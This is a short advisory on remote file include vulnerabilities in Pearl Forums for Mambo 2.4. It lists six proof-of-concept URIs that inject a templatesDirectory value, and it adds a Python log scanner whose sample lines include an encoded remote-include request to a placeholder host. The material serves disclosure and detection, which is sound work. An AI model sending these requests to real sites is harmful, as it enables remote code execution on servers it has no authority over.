Title: Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
Published: 2006-11-22-12:00AM
Updated: 2006-11-24-08:25PM
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Credit: Dr Max Virus is credited with the discovery of these vulnerabilities.
Vulnerable: Pearl Forums Pearl For Mambo 2.4
Not Vulnerable:
Code: An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code
http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code
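
One way to look for these requests in web server access logs, as an added example that is not part of the original advisory. The parameter names and the includes/ path come from the URIs above; the combined log format, the function name find_rfi_attempts and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names taken from the advisory's URIs (bare and array form).
PARAM_RE = re.compile(r'^(?:GlobalSettings\[)?templatesDirectory\]?$', re.I)
# A value that begins with a URL scheme points the include at another host.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)


def find_rfi_attempts(log_lines):
    """Return (client, script, verdict) for requests that set templatesDirectory."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # Every affected script in the advisory sits directly under includes/.
        if not re.search(r'/includes/[^/]+\.php$', url.path, re.I):
            continue
        # parse_qsl percent-decodes names, so %5B/%5D forms are matched too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if PARAM_RE.match(name):
                # A client has no reason to supply this setting at all;
                # a URL-valued one is the remote-include case.
                verdict = "remote-include" if REMOTE_RE.match(value) else "config-override"
                hits.append((client, url.path.rsplit("/", 1)[-1], verdict))
    return hits


# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Nov/2006:20:25:01 +0000] "GET /forum/includes/poll.php?GlobalSettings%5BtemplatesDirectory%5D=http%3A%2F%2Fhost.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Nov/2006:20:25:03 +0000] "GET /forum/includes/admin.php?templatesDirectory=templates/ HTTP/1.1" 200 498',
    '203.0.113.9 - - [24/Nov/2006:20:26:10 +0000] "GET /forum/index.php?option=com_forum HTTP/1.1" 200 9031',
    '203.0.113.9 - - [24/Nov/2006:20:26:12 +0000] "GET /forum/includes/profile.php?user=42 HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```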
Copyright 2007, SecurityDot